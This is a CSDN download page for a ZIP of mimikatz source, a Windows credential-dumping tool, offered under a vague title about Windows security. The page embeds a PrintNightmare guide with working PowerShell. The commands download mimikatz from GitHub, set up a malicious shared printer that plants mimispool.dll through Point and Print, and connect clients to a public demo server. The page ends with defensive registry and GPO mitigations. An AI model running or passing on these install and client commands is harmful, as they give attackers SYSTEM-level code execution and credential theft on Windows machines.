一个玩转Windows安全的小工具___下载.zip资源-CSDN文库

共362个文件

h：166个

c：139个

lib：26个

版权申诉

96 浏览量 2023-04-19 00:50:18 上传评论收藏 2.92MB ZIP 举报

资源推荐

资源详情

资源评论

收起资源包目录

一个玩转Windows安全的小工具___下载.zip （362个子文件）

sqlite3.c 7.58MB

kuhl_m_lsadump_dc.c 121KB

kuhl_m_lsadump.c 108KB

kuhl_m_misc.c 86KB

kuhl_m_sekurlsa.c 64KB

kuhl_m_crypto.c 54KB

kull_m_crypto.c 49KB

kull_m_dpapi.c 47KB

kull_m_rpc_ms-drsr_c.c 44KB

kuhl_m_sekurlsa_kerberos.c 42KB

kuhl_m_kerberos.c 40KB

kuhl_m_crypto_extractor.c 38KB

kkll_m_notify.c 37KB

kwindbg.c 34KB

kuhl_m_net.c 32KB

kuhl_m_dpapi.c 30KB

kull_m_process.c 28KB

kull_m_cred.c 27KB

kuhl_m_vault.c 26KB

kull_m_rpc_drsr.c 26KB

kuhl_m_ngc.c 25KB

kuhl_m_crypto_pki.c 25KB

kuhl_m_ts.c 23KB

kull_m_rpc_ms-odj.c 23KB

kull_m_rpc_ms-rprn.c 23KB

kull_m_rpc_ms-par_c.c 22KB

kuhl_m_dpapi_oe.c 21KB

kull_m_registry.c 19KB

kuhl_m_sr98.c 19KB

kuhl_m_sekurlsa_packages.c 19KB

kull_m_string.c 19KB

kuhl_m_kerberos_pac.c 19KB

kuhl_m_rpc.c 17KB

mimilove.c 17KB

kuhl_m_crypto_sc.c 16KB

kuhl_m_sekurlsa_nt5.c 16KB

kull_m_key.c 16KB

kull_m_rpc.c 15KB

kull_m_memory.c 15KB

kuhl_m_kerberos_ticket.c 15KB

kuhl_m_dpapi_cloudap.c 14KB

kuhl_m_sid.c 13KB

kuhl_m_misc_djoin.c 13KB

kuhl_m_crypto_patch.c 13KB

kull_m_busylight.c 12KB

kuhl_m_process.c 12KB

kuhl_m_minesweeper.c 11KB

kuhl_m_sekurlsa_nt6.c 11KB

kuhl_m_token.c 11KB

kull_m_crypto_ngc.c 11KB

kuhl_m_iis.c 11KB

kkll_m_process.c 11KB

kuhl_m_dpapi_chrome.c 11KB

kuhl_m_kernel.c 10KB

kuhl_m_dpapi_ssh.c 10KB

kuhl_m_sekurlsa_utils.c 10KB

kull_m_rpc_ms-nrpc_c.c 10KB

kull_m_rpc_ms-pac.c 10KB

kull_m_rpc_mimicom.c 10KB

kuhl_m_event.c 10KB

kuhl_m_dpapi_keys.c 10KB

kuhl_m_sekurlsa_msv1_0.c 9KB

kull_m_pn532.c 9KB

kull_m_rpc_ms-credentialkeys.c 9KB

kuhl_m_standard.c 9KB

kull_m_rdm.c 9KB

kull_m_sr98.c 8KB

kuhl_m_dpapi_creds.c 8KB

kcredentialprovider.c 8KB

mimikatz.c 8KB

kull_m_token.c 8KB

kull_m_rpc_ms-claims.c 8KB

kuhl_m_kerberos_ccache.c 8KB

kuhl_m_busylight.c 8KB

kuhl_m_sekurlsa_sk.c 8KB

kull_m_remotelib.c 8KB

kull_m_rpc_ms-efsr_c.c 7KB

kuhl_m_sysenvvalue.c 7KB

kkll_m_filters.c 7KB

mimidrv.c 7KB

kuhl_m_dpapi_lunahsm.c 7KB

kuhl_m_sekurlsa_utils.c 7KB

kull_m_cabinet.c 6KB

kull_m_service.c 6KB

kull_m_file.c 6KB

kull_m_rpc_dpapi-entries.c 6KB

kuhl_m_kerberos_claims.c 6KB

kuhl_m_service.c 6KB

kull_m_crypto_sk.c 6KB

kuhl_m_dpapi_rdg.c 6KB

kuhl_m_service_remote.c 6KB

kuhl_m_sekurlsa_dpapi.c 6KB

kuhl_m_misc_citrix.c 6KB

kull_m_rpc_ms-bkrp_c.c 5KB

kuhl_m_dpapi_sccm.c 5KB

kuhl_m_lsadump_remote.c 5KB

kull_m_minidump.c 5KB

kuhl_m_sekurlsa_nt6.c 5KB

kuhl_m_sekurlsa_cloudap.c 5KB

kull_m_patch.c 5KB

共 362 条

## PowerShell commands ### Server #### install ``` $printerName = 'Kiwi Legit Printer' $system32 = $env:systemroot + '\system32' $drivers = $system32 + '\spool\drivers' $RegStartPrinter = 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\' + $printerName Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip' -OutFile '.\mimikatz_trunk.zip' Expand-Archive -Path '.\mimikatz_trunk.zip' -DestinationPath '.\mimikatz_trunk' Copy-Item -Force -Path ($system32 + '\mscms.dll') -Destination ($system32 + '\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\x64\mimispool.dll' -Destination ($drivers + '\x64\3\mimispool.dll') Copy-Item -Force -Path '.\mimikatz_trunk\win32\mimispool.dll' -Destination ($drivers + '\W32X86\3\mimispool.dll') Add-PrinterDriver -Name 'Generic / Text Only' Add-Printer -DriverName 'Generic / Text Only' -Name $printerName -PortName 'FILE:' -Shared New-Item -Path ($RegStartPrinter + '\CopyFiles') | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Kiwi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Directory' -PropertyType 'String' -Value 'x64\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Kiwi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Litchi') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Directory' -PropertyType 'String' -Value 'W32X86\3' | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Files' -PropertyType 'MultiString' -Value ('mimispool.dll') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Litchi') -Name 'Module' -PropertyType 'String' -Value 'mscms.dll' | Out-Null New-Item -Path ($RegStartPrinter + '\CopyFiles\Mango') | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Directory' -PropertyType 'String' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Files' -PropertyType 'MultiString' -Value $null | Out-Null New-ItemProperty -Path ($RegStartPrinter + '\CopyFiles\Mango') -Name 'Module' -PropertyType 'String' -Value 'mimispool.dll' | Out-Null ``` #### uninstall ``` $printerName = 'Kiwi Legit Printer' $system32 = $env:systemroot + '\system32' $drivers = $system32 + '\spool\drivers' Remove-Printer -Name $printerName Start-Sleep -Seconds 2 Remove-PrinterDriver -Name 'Generic / Text Only' Remove-Item -Force -Path ($drivers + '\x64\3\mimispool.dll') Remove-Item -Force -Path ($drivers + '\W32X86\3\mimispool.dll') Remove-Item -Force -Path ($system32 + '\mimispool.dll') ``` ### Client #### Any computer with explicit credential to `printnightmare.gentilkiwi.com` ``` $serverName = 'printnightmare.gentilkiwi.com' $username = 'gentilguest' $password = 'password' $printerName = 'Kiwi Legit Printer' $fullprinterName = '\\' + $serverName + '\' + $printerName $credential = (New-Object System.Management.Automation.PSCredential($username, (ConvertTo-SecureString -AsPlainText -String $password -Force))) Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' -ErrorAction SilentlyContinue Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue New-PSDrive -Name 'KiwiLegitPrintServer' -Root ('\\' + $serverName + '\print$') -PSProvider FileSystem -Credential $credential | Out-Null Add-Printer -ConnectionName $fullprinterName $driver = (Get-Printer -Name $fullprinterName).DriverName Remove-Printer -Name $fullprinterName Remove-PrinterDriver -Name $driver Remove-PSDrive -Force -Name 'KiwiLegitPrintServer' # mimispool still in spool\drivers ``` #### Computer in domain (single sign on with current user to print server) ``` $serverName = 'print.lab.local' $printerName = 'Kiwi Legit Printer' $fullprinterName = '\\' + $serverName + '\' + $printerName Remove-Printer -Name $fullprinterName -ErrorAction SilentlyContinue Add-Printer -ConnectionName $fullprinterName $driver = (Get-Printer -Name $fullprinterName).DriverName Remove-Printer -Name $fullprinterName Remove-PrinterDriver -Name $driver # mimispool still in spool\drivers ``` ## Protect _to adapt to your environment_ **Please, do not set `RestrictDriverInstallationToAdministrators` to `0` without these settings** ### Registry #### `.reg` file ``` Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint] "PackagePointAndPrintOnly"=dword:00000001 "PackagePointAndPrintServerList"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers] "1"="/your really legit servers or invalid entry !/" ``` #### commands ``` reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v 1 /t REG_SZ /d "/your really legit servers or invalid entry !/" reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1 ``` ### Registry with real printer servers and allowing non-administrators to install package P&P drivers & printers #### `.reg` file ``` Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint] "PackagePointAndPrintOnly"=dword:00000001 "PackagePointAndPrintServerList"=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers] "srv1.fqdn"="srv1.fqdn" "srv2.fqdn"="srv2.fqdn" [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint] "RestrictDriverInstallationToAdministrators"=dword:00000000 ``` #### commands ``` reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintServerList /t REG_DWORD /d 1 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv1.fqdn" /t REG_SZ /d "srv1.fqdn" reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint\ListofServers" /f /v "srv2.fqdn" /t REG_SZ /d "srv2.fqdn" reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PackagePointAndPrint" /f /v PackagePointAndPrintOnly /t REG_DWORD /d 1 reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /f /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 0 ``` ### GPO / Local In `Computer Configuration`, `Administrative Templates`, `Printers`, enable: - `Only use Package Point and Print` - `Package Point and Print - Approved servers` ![image](https://user-images.githubusercontent.com/2307945/129240741-b2a0ba14-6858-4c3f-ad07-07fa55efca29.png) ### GPO with real printer servers and allowing non-administrators to install package P&P drivers & printers Same configuration as previously - _with real printer server names this time_ - but do not forget to add registry key `RestrictDriverInstallationToAdministrators` to `0` ![image](https://user-images.githubusercontent.com/2307945/133833820-a66b3ffd-a3aa-43a2-a1bf-14581a2a7492.png)

评论收藏

内容反馈

版权申诉